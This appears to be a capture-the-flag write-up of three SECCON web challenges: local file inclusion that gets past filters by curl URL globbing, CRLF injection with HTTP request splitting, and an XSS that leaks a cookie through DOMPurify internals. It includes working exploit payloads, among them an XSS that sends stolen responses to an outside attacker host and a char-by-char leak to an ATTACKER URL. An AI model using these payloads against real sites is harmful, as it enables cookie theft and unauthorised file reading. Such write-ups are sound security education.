curl $(python -c 'print("http://target/?"+"proxy="+"q"*1000+"&a=b"*998+"&c=d")')

easylfi

The goal is to LFI /flag.txt

This flask app use curl to get a local file

        proc = subprocess.run(
            ["curl", f"file://{os.getcwd()}/public/{filename}"],
            capture_output=True,
            timeout=1,
        )

where filename is a path parameter

@app.route("/")
@app.route("/<path:filename>")
def index(filename: str = "index.html"):

Apparently, we need to traverse like ../../../../flag.txt

There are two WAFs. The first one filter filename with % or ..

    if ".." in filename or "%" in filename:
        return "Do not try path traversal :("

Here, we use URL globbing to bypass the first WAF. {.}{.}/ equals to ../ , so

we can access flag.txt with {.}{.}/{.}{.}/flag.txt

The second WAF filter any response with content SECCON

@app.after_request
def waf(response: Response):
    if b"SECCON" in b"".join(response.response):
        return Response(b"Try harder")
    return response

I found a logic flaw in validate func used by custom template func. We can substitue any string for { , though the function is intented to allow only keys like {...}

    for i, c in enumerate(key):
        if i == 0:
            is_valid &= c == "{"
        elif i == len(key) - 1:
            is_valid &= c == "}"
        else:
            is_valid &= c != "{" and c != "}"

But there's still a problem. We can only replace one { now, and it is not enough to enclose SECCON in curly brackets.

ginoah found that we can use {.,.} to make the filename we curl reflected in the output. e.g.

$ curl 'file:///app/public/{.}{.}/{.}{.}/flag.tx{\{,t}'
--_curl_--file:///app/public/../../flag.tx{
--_curl_--file:///app/public/../../flag.txt
SECCON{dummydummy}

Now we have two { , we can replace the output twice to eliminate string SECCON by GET /{.}{.}/{.}{.}/flag.tx{\{,t}?{=}{&{%0a--curl--file:///app/public/../../flag.txt%0aSECCON}=FLAG

The original solution by ginoah is trickier and shorter than it. We can use query string in file:// protocol, though it takes no effect.  The query string is revealed in the output e.g.

$ curl 'file:///app/public/{.}{.}/{.}{.,.}/flag.txt?\{'
--_curl_--file:///app/public/../../flag.txt?{
SECCON{dummydummy}
--_curl_--file:///app/public/../../flag.txt?{
SECCON{dummydummy}

Then, we can get the flag by

GET /{.}{.}/{.}{.}/{.}{.,.}/flag.txt%3f\{?{=}{&{%0aSECCON}=x

bffcalc

The service is full of proxies and composed of five components - nginx, bff, backend, report, bot. I conclude that the normal user can use service in two way.

First way is normal browsing nginx URL / -> bff cherrypy proxies -> backend evalute parameter 'expr' and return .

Another way is triggered by bot nginx URL /report -> report send to -> bot emulate as normal user, set cookie in site 'nginx:3000' and browse -> nginx URL / -> ...

There is an apparent XSS without any limitation when bot browsing http://nginx:3000 with provided expr, but we cannot access flag via only XSS since the FLAG is set in cookie with HTTPOnly flag.

The bff<->backend proxy communication is implemented by custom socket,  and it is apparently full of flaw.  The  first flaw is that cherrypy doesn't do urldecode for req.path_info , so we have a CRLF injection in bff.

method = req.method
path = req.path_info
if req.query_string:
    path += "?" + req.query_string
payload += f"{method} {path} HTTP/1.1\r\n"

The second flaw is that custom socket recv at most 4096 bytes, then we have a HTTP Request Splitting. We can CRLF injection request and recieve all response at once.

    try:
        data = sock.recv(4096)
        body = data.split(b"\r\n\r\n", 1)[1].decode()

It is important that bff can only get expr  from query string, but backend can get expr from both body and query string. And if length of expr is more than 50, backend just return it without eval. (This is also why a XSS occured.)

class Root(object):
    ALLOWED_CHARS = "0123456789+-*/ "

    @cherrypy.expose
    def default(self, *args, **kwargs):
        expr = str(kwargs.get("expr", 42))

Thus, the attack chain is XSS -> CRLF Injection POST request-> steal header behind expr in body -> backend reflect expr  -> recieve all response at once -> XSS to send out the FLAG. It works in my computer :D

Unfortunately, it doesn't work at remote. It stop at User-agent: ...X11 After hours of debug, a bright idea suddenly occurs (called 通靈 in chinese). We  guess cherrypy parses body not only by & , but also by; . And it does. Remember that we can only get back the content in expr , and it is truncated by ; after X11 ;_;. We found there are two ; after expr, one is in User-agent , and the other is in Accept-language

For security reason, chrome disallow user to change some of headers, and User-agent is one of those, but Accept-Lanuage is not. We overwrite Accept-Lanuage, and set a custom header, which is located after User-agent. Thus, we can steal content after User-agent.

This is the final payload.

POST /report HTTP/1.1
Host: bffcalc.seccon.games:3000
Content-Length: 553
Content-Type: application/x-www-form-urlencoded

expr=%3Cimg+src%3Dx+onerror%3D%22fetch%28%27http%3A%2F%2Fnginx%3A3000%2Fapi%2520HTTP%2F1.1%250d%250aConnection:keep-alive%250d%250aHost%3Anginx%3A3000%250d%250a%250d%250aPOST%2520%2F%2520HTTP%2F1.1%250d%250aHost%3Alocalhost%3A3000%250d%250aContent-type%3Aapplication%2Fx-www-form-urlencoded%250d%250aContent-length%3A475%250d%250a%250d%250aexpr%3d%27,{headers:{aaa:'%3bexpr%3d','Accept-Language':'en-us'}}%29.then%28r%3D%3E%28r.text%28%29%29%29.then%28r%3D%3E%7Blocation.href%3D%27http%3A%2F%2Fcjis.ooo%3A4445%2F%27%2Bbtoa%28r%29%7D%29%22%3E%3C%2Fimg%3E

piyosay

This was solved by ginoah when i was asleep.

It is a XSS challenge, and FLAG is set in Cookie without HTTPOnly.

We can control two parameter message and emoji, and any assignment to innerHTML will be applied with trustedTypes default policy

    trustedTypes.createPolicy("default", {
      createHTML: (unsafe) => {
        return DOMPurify.sanitize(unsafe)
          .replace(/SECCON{.+}/g, () => {
            // Delete a secret in RegExp
            "".match(/^$/);
            return "SECCON{REDACTED}";
          });
      },
    });

It sanitize input and replace any string like /SECCON{.+}/g . And also do regex again to clean up secret in RegExp like RegExp.$_, RegExp.['$+']... .

Cookie is appended after message and deleted immediately.  Assign message.innerHTML with santized message and then assign again with sanitized and replaced emoji .

const main = async () => {
const params = new URLSearchParams(location.search);

const message = `${params.get("message")}${
document.cookie.split("FLAG=")[1] ?? "SECCON{dummy}"
}`;
// Delete a secret in document.cookie
document.cookie = "FLAG=; expires=Thu, 01 Jan 1970 00:00:00 GMT";
get("message").innerHTML = message;

const emoji = get(params.get("emoji"));
get("message").innerHTML = get("message").innerHTML.replace(/{{emoji}}/g, emoji);
};

get func has a apparent object traversal problem when input is controllable, just like const emoji = get(params.get("emoji")); . And everyone knows, we can traverse any Node element to document via ownerDocument and any Document element to window via defaultView .

const get = (path) => {
	return path.split("/").reduce((obj, key) => obj[key], document.all);
};

So, what should we traverse to via emoji to get back our eliminated FLAG?

ginoah found that DOMPurify will saved removed part in DOMPurify.removed . And we trick DOMPurify to remove SECCON{.+} before it is replaced. Set message=<img src=http://attacker/{{emoji}}><script> and we get back FLAG via emoji=0/ownerDocument/defaultView/DOMPurify/removed/0/element/innerText/${i} . It replace {{emoji}} with the i-th char of FLAG, so we can leak FLAG char by char.

Final payload.

http://target/result?emoji=0/ownerDocument/defaultView/DOMPurify/removed/0/element/innerText/${i}&message=%3Cimg%20src=http://ATTACKER/{{emoji}}%3E%3Csciprt%3E

There are some interesting solution from others writeups.

@huli use the trick that when parent and iframe are cross-site, iframecannot manipulate document.cookie , no matter read/write.  Then get FLAG from top.opener.document.cookie

@tyage use an apparent(?) XSS payload and also the immutable cookie trick in iframe . My ancestor said that it is dangerous to do any string manipulation after DOMPurify.sanitize, and we just overlook it lol.